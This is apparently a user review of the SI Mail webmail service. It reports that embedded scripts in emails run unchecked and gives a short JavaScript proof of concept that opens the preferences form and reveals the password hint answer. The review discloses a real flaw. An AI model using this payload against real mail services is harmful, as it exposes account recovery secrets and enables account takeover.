SI Mail is reckless in the way it deals with embedded HTML and cgi calls from its email system. I signed up for SI mail (battaliou@siliconinvestor.com) and sent myself the following javascript:

function one(){
alert(wo.document.forms.prefs.hintanswer.value);
wo.close();
}
var s= '../../../../../../../../siliconinvestor/noframes/mailer/t_baseform.asp?whattodo=user&toolbar=y'
wo=window.open(s,'');
self.focus();
setTimeout('one()',5000);


This had the effect of displaying my password hint answer. This is not good.

Seeing their email service was provided by commtouch.com I suppose Silicon Investor can't be held totally responsible for this oversight.

On a positive note, the service is very easy to use and if you don't mind your email being open to the world, it would make a fine junk-mail account. Use this service at your own risk.



Recommended: No